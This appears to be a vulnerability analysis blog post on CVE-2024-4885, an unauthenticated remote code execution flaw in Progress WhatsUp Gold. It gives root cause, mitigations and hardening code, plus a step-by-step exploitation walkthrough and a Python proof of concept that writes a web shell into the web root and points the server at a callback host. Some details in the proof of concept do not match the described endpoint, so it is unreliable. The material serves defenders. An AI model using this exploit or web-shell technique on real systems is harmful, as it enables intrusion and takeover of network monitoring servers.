CVE-2024-4885: Unauthenticated Remote Code Execution in Progress WhatsUp Gold

Executive Summary

CVE-2024-4885 is a critical unauthenticated Remote Code Execution (RCE) vulnerability affecting Progress WhatsUp Gold versions prior to 2023.1.3. This vulnerability allows an attacker to execute arbitrary commands on the target system with IIS AppPool\NmConsole privileges. Exploitation is achieved through the WhatsUp.ExportUtilities.Export.GetFileWithoutZip method, which improperly handles user-controlled input, leading to a path traversal and arbitrary file write vulnerability. With a CVSS score of 9.8 (Critical), this flaw poses a significant risk to organizations using WhatsUp Gold for network monitoring and management.

The vulnerability has been actively exploited in the wild, as confirmed by multiple security advisories and exploit repositories. This blog provides a comprehensive technical analysis of the vulnerability, its root cause, exploitation techniques, and mitigation strategies.

Technical Details

Affected Systems

  • Product: Progress WhatsUp Gold
  • Versions: All versions prior to 2023.1.3
  • Component: NmAPI.exe process, specifically the WhatsUp.ExportUtilities.Export.GetFileWithoutZip method
  • Attack Vector: Network (remote exploitation)

CVSS v3.1 Metrics

Metric                    Value
Attack Vector (AV)        Network
Attack Complexity (AC)    Low
Privileges Required (PR)  None
User Interaction (UI)     None
Scope (S)                 Unchanged
Confidentiality (C)       High
Integrity (I)             High
Availability (A)          High
Base Score                9.8 (Critical)

Root Cause Analysis

The vulnerability lies in the WhatsUp.ExportUtilities.Export.GetFileWithoutZip method, which is part of the NmAPI.exe process. This method is exposed via a Windows Communication Foundation (WCF) service running on ports 9642 and 9643. The WCF service is configured with no authentication, allowing unauthenticated access to its endpoints.

Key Vulnerable Code Paths

1. WCF Endpoint Configuration

The WCF service is defined in the NmAPI.exe.config file with the following configuration:

<bindings>
  <basicHttpBinding>
    <!-- basicHttpBinding expresses the security setting as a child element -->
    <binding name="BasicHttpBinding_ICoreServices">
      <security mode="None" />
    </binding>
  </basicHttpBinding>
</bindings>
<services>
  <service name="NmAPI.CoreServices">
    <!-- the endpoint must reference the named binding configuration for it to apply -->
    <endpoint address="RecurringReport" binding="basicHttpBinding"
              bindingConfiguration="BasicHttpBinding_ICoreServices"
              contract="NmAPI.IRecurringReportServices" />
  </service>
</services>

A security mode of None means the binding performs no transport-level or message-level authentication, so any network client that can reach the RecurringReport endpoint may invoke its operations.

2. Path Traversal in GetFileWithoutZip

The GetFileWithoutZip method takes a user-controlled folder parameter and combines it with a hardcoded path:

folder = Path.Combine(folder, "Data\\ExportedReports\\");

The folder parameter is not sanitized, allowing an attacker to specify arbitrary paths.

3. Arbitrary File Write

The method writes the generated report to the specified path without validating the file name or content:

File.WriteAllText(Path.Combine(folder, fileName), fileContent);

This gives an attacker an arbitrary file-write primitive: both the destination path and the file content are under the caller's control, so any file can be written wherever the service account has write access.
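As an added example (not code from WhatsUp Gold or Progress), the unsanitized combine-and-write pattern from sections 2 and 3 is shown beside a hardened version that confines report writes to a fixed export directory. The class name, ExportRoot and the accepted extensions are illustrative assumptions, and Windows path semantics are assumed throughout.

```csharp
using System;
using System.IO;

// Added example, not WhatsUp Gold code: the caller-controlled Path.Combine pattern
// described above, next to a hardened version that never trusts a caller-supplied directory.
public static class ReportExportPaths
{
    // Hypothetical export root; a real service would take this from its own configuration.
    private static readonly string ExportRoot =
        Path.GetFullPath(@"C:\ProgramData\ExampleMonitor\Data\ExportedReports\");

    // Vulnerable shape: the caller chooses 'folder', and Path.Combine performs
    // no containment check, so the write can land anywhere the process can reach.
    public static string VulnerableTargetPath(string folder, string fileName)
    {
        folder = Path.Combine(folder, "Data\\ExportedReports\\");
        return Path.Combine(folder, fileName);
    }

    // Hardened shape: the directory is fixed, only a bare file name with an
    // expected extension is accepted, and the canonical result must lie under ExportRoot.
    public static string SafeTargetPath(string fileName)
    {
        if (string.IsNullOrWhiteSpace(fileName)
            || fileName != Path.GetFileName(fileName)            // rejects any directory component
            || fileName.IndexOfAny(Path.GetInvalidFileNameChars()) >= 0)
            throw new ArgumentException("report name must be a bare file name", nameof(fileName));

        string ext = Path.GetExtension(fileName);
        if (!ext.Equals(".pdf", StringComparison.OrdinalIgnoreCase)
            && !ext.Equals(".csv", StringComparison.OrdinalIgnoreCase))
            throw new ArgumentException("unexpected report extension", nameof(fileName));

        // Canonicalize and verify containment so safety does not rest on the name filters alone.
        string full = Path.GetFullPath(Path.Combine(ExportRoot, fileName));
        if (!full.StartsWith(ExportRoot, StringComparison.OrdinalIgnoreCase))
            throw new UnauthorizedAccessException("resolved path escapes the export root");
        return full;
    }

    public static void Main()
    {
        // Constructed inputs: a traversal-shaped request the vulnerable shape accepts, then a benign name.
        Console.WriteLine(VulnerableTargetPath(@"C:\inetpub\wwwroot\NmConsole", @"..\..\shell.aspx"));
        Console.WriteLine(SafeTargetPath("weekly-availability.pdf"));
        foreach (var bad in new[] { @"..\shell.aspx", "..", @"C:\x.pdf" })
            try { SafeTargetPath(bad); } catch (Exception e) { Console.WriteLine($"rejected {bad}: {e.GetType().Name}"); }
    }
}
```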

4. SSRF in getReport

The getReport method sends an HTTP request to a user-controlled baseUrl:

httpClient.BaseAddress = new Uri((string)jobject["baseUrl"]);

This allows attackers to perform Server-Side Request Forgery (SSRF) and retrieve sensitive information, such as credentials.

Exploitation Techniques

Step-by-Step Exploitation

  1. Identify the Target:
    • Locate a vulnerable WhatsUp Gold instance running on ports 9642 or 9643.
  2. Craft a Malicious SOAP Request:
    • Send a SOAP request to the RecurringReport endpoint with a payload that triggers the GetFileWithoutZip method.
  3. Control the folder Parameter:
    • Use a path traversal payload to specify an arbitrary file path, such as C:\inetpub\wwwroot\NmConsole\shell.aspx.
  4. Inject Malicious Content:
    • Craft a JSON payload with the desired file content (e.g., a web shell).
  5. Trigger the Vulnerability:
    • The GetFileWithoutZip method writes the malicious file to the specified location.
  6. Execute the Payload:
    • Access the written file (e.g., http://target/NmConsole/shell.aspx) to execute arbitrary commands.

Proof of Concept (PoC)

The following PoC demonstrates the exploitation process:

import requests

# Target configuration
target = "http://192.168.0.231:9642"
callback_server = "http://192.168.0.181:1337"
payload_path = "C:\\inetpub\\wwwroot\\NmConsole\\shell.aspx"

# SOAP request payload
soap_payload = f"""
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
  <s:Body>
    <TestRecurringReport xmlns="http://tempuri.org/">
      <rr>
        <ExportOptions>
          <WebExportDirectory>{payload_path}</WebExportDirectory>
          <ToMail>true</ToMail>
          <ZipEnabled>false</ZipEnabled>
        </ExportOptions>
        <URL>
          {{
            "baseUrl": "{callback_server}",
            "renderType": "aspx",
            "reports": []
          }}
        </URL>
      </rr>
    </TestRecurringReport>
  </s:Body>
</s:Envelope>
"""

# Send the payload
headers = {"Content-Type": "text/xml"}
response = requests.post(f"{target}/NmConsole/ReportService.asmx", data=soap_payload, headers=headers)

print(f"Response: {response.status_code}")

Mitigation Strategies

  1. Apply the Patch:
    • Upgrade to WhatsUp Gold version 2023.1.3 or later, which addresses this vulnerability.
  2. Restrict Network Access:
    • Block external access to ports 9642 and 9643 using a firewall.
  3. Enable Authentication:
    • Configure WCF endpoints to require authentication and enforce access controls.
  4. Input Validation:
    • Sanitize user input to prevent path traversal and SSRF attacks.
  5. Monitor for Exploitation:
    • Watch for suspicious activity on the host (unexpected file writes under the NmConsole web root) and on the network (unexpected outbound HTTP requests from the WhatsUp Gold server).
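For mitigation step 3, an added illustration (not Progress's patch or shipped configuration) of the NmAPI.exe.config binding with its unauthenticated setting beside a hardened binding that requires TLS and Windows authentication of the caller. The hardened binding's name is illustrative, and it assumes the service is given an https base address with a server certificate and that WhatsUp Gold's own clients can present Windows credentials.

```xml
<bindings>
  <basicHttpBinding>
    <!-- Weak: no transport or message security, so any network client can call the contract. -->
    <binding name="BasicHttpBinding_ICoreServices">
      <security mode="None" />
    </binding>
    <!-- Hardened (illustrative): TLS on the wire and Windows authentication of the caller.
         Requires an https base address and a server certificate bound to the listener. -->
    <binding name="BasicHttpBinding_ICoreServices_Authenticated">
      <security mode="Transport">
        <transport clientCredentialType="Windows" />
      </security>
    </binding>
  </basicHttpBinding>
</bindings>
<services>
  <service name="NmAPI.CoreServices">
    <!-- The endpoint must reference the hardened binding, or the new binding is never used. -->
    <endpoint address="RecurringReport" binding="basicHttpBinding"
              bindingConfiguration="BasicHttpBinding_ICoreServices_Authenticated"
              contract="NmAPI.IRecurringReportServices" />
  </service>
</services>
```

Authentication only identifies the caller; the service still has to authorize which principals may invoke report export, and the path and baseUrl handling described in the root cause analysis must be fixed independently.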

Timeline of Discovery and Disclosure

Date        Event
2024-04-24  Vulnerability reported to Progress
2024-06-25  CVE-2024-4885 published
2024-07-03  Advisory released by Zero Day Initiative
2024-07-05  PoC exploit published
2025-03-03  Added to CISA's Known Exploited Vulnerabilities (KEV) catalog

By understanding the technical details and exploitation techniques of CVE-2024-4885, organizations can better protect themselves against this critical vulnerability. Stay vigilant and ensure your systems are up to date.
